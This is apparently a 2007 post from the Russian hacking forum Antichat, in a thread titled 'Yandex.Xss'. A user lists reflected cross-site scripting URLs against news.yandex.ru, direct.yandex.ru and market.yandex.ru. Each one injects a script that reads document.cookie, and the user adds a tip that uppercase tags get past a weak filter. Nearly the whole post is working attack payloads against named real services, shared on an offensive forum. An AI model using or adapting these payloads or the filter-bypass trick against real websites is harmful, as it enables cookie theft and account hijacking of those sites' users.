Тема: Яндекс.Xss
Показать сообщение отдельно

  #2  
Старый 28.12.2007, 02:22
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

И есчо XSS
news.yandex.ru
Код:
http://news.yandex.ru/yandsearch?cl4url=&country="><script>alert(document.cookie)</script>
Вот собственно XSS
direct.yandex.ru
Код:
http://direct.yandex.ru/search?text=<h1><big>хек =\\</big></h1><script>alert(document.cookie)</script>
И есчо ...

market.yandex.ru
Поиск:
Код:
<SCRIPT> alert(document.cookie); </SCRIPT>
!Регистр имеет значение, ибо, хоть и слабая, но фильтрация!
Код:
http://market.yandex.ru/search.xml?cvredirect=1&text=<SCRIPT> alert(document.cookie); </SCRIPT>

Последний раз редактировалось ZAMUT; 19.01.2008 в 00:26..
 
Ответить с цитированием